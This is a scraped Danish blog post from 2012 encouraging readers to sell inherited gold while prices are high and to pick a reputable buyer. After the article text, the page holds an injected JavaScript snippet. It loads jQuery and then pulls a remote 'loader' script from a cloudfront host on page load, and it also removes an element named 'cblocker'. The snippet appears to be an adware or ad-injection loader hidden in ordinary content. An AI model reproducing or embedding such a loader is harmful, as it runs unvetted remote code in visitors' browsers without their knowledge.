Smartlog v3 » Tips, Guides & Informationer » Mange steder hvor guld købes
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Mange steder hvor guld købes

15. Jun 2012 15:26, webmayn

Det er i øjeblikket rigtig gode tider at sælge sit guld. Guldpriserne er høje, hvilket skyldes den økonomiske krise, fordi investorer hellere vil sætte deres penge på noget sikkert, som fx guld. Det er risikabelt at investere for tiden, fordi man kan komme ud for et heftigt fald i pris, på det man har investeret i, hvilket gør at man kan tabe utroligt mange penge.
Derfor er priserne på bl.a. guld steget voldsomt i det sidste stykke tid, da folk ved at guld aldrig vil miste værdien. Guld har en lang historie bag sig, hvor det har været det mest værdifulde ædelmetal, og det stoler folk på ikke ændrer sig.

Derfor kan man med rigtig god grund overveje at sælge sit guld nu, hvis man også selv føler at krisen sætter et pres på privatøkonomien. Der er mange steder hvor guld købes, men man må også sørge for at undersøge markedet, og se hvem der har de bedste priser. Man kan lige så godt få så meget ud af sit guld, når nu man har besluttet sig for at sælge arvestykkerne, som alligevel bare ligger i skuffen.

Sørg for at vælge et sted, som virker troværdigt, og som også har nogle gode referencer, evt. fra medierne eller andre steder. På denne måde kommer man lettere udenom de små virksomheder, der blot prøver at få mest ud af sine kunder. 
if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede